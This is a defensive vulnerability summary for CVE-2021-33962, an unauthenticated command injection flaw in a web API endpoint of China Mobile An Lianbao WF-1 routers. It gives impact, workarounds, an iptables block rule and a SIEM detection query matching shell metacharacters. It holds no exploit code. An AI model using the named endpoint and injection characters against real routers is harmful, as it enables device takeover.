CVE-2021-33962
📋 TL;DR
This CVE describes an OS command injection vulnerability in China Mobile An Lianbao WF-1 routers that allows attackers to execute arbitrary commands on the device. The vulnerability exists in the web interface's /api/ZRUsb/pop_usb_device component and affects users of this specific router model. Attackers can exploit this to gain full control of the router.
💻 Affected Systems
- China Mobile An Lianbao WF-1 router
📦 What is this software?
An Lianbao Wf Firmware 1 by Chinamobileltd
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the router allowing attackers to intercept all network traffic, install persistent malware, pivot to internal networks, and use the router as part of a botnet.
Likely Case
Router takeover leading to DNS hijacking, credential theft from network traffic, and deployment of malware to connected devices.
If Mitigated
Limited impact if router is isolated from critical systems and proper network segmentation is in place.
🎯 Exploit Status
Exploit details are publicly available on GitHub. The vulnerability requires no authentication and has simple exploitation vectors.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: http://iot.10086.cn/?l=en-us
Restart Required: No
Instructions:
Check vendor website for firmware updates. If available, download latest firmware from http://iot.10086.cn and apply through router web interface.
🔧 Temporary Workarounds
Disable web interface remote access
allPrevent external access to router management interface
Login to router admin panel -> Security/Firewall -> Disable remote management/remote access
Block access to vulnerable endpoint
linuxUse router firewall to block access to /api/ZRUsb/pop_usb_device
iptables -A INPUT -p tcp --dport 80 -m string --string "/api/ZRUsb/pop_usb_device" --algo bm -j DROP
🧯 If You Can't Patch
- Replace the router with a different model that receives security updates
- Place router behind a dedicated firewall that blocks all management interface traffic
🔍 How to Verify
Check if Vulnerable:
Check router firmware version in web interface. If version is v1.0.1, the device is vulnerable.Check Version:
curl -s http://router-ip/ | grep -i firmwareVerify Fix Applied:
Verify firmware version has been updated from v1.0.1. Test if /api/ZRUsb/pop_usb_device endpoint still exists.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /api/ZRUsb/pop_usb_device
- Commands with shell metacharacters in URL parameters
- Unexpected process execution from web server
Network Indicators:
- HTTP requests containing shell commands in parameters
- Traffic to /api/ZRUsb/pop_usb_device from external IPs
SIEM Query:
source="router.log" AND (uri="/api/ZRUsb/pop_usb_device" OR cmd="*;*" OR cmd="*|*" OR cmd="*`*" OR cmd="*$(*")🔗 References
- http://iot.10086.cn/?l=en-us
- https://github.com/pokerfacett/MY_CVE_CREDIT/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection12.md
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-03520
- https://www.ebuy7.com/item/china-mobile-wireless-router-qualcomm-qiki-wifi6-routing-mesh-network-home-5g-dual-frequency-double-gigabit-port-wall-wall-high-speed-%E2%80%8B%E2%80%8Bhigh-power-enhanced-dormitory-students-an-lianbao-wf-1-628692180620
- http://iot.10086.cn/?l=en-us
- https://github.com/pokerfacett/MY_CVE_CREDIT/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection12.md
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-03520
- https://www.ebuy7.com/item/china-mobile-wireless-router-qualcomm-qiki-wifi6-routing-mesh-network-home-5g-dual-frequency-double-gigabit-port-wall-wall-high-speed-%E2%80%8B%E2%80%8Bhigh-power-enhanced-dormitory-students-an-lianbao-wf-1-628692180620
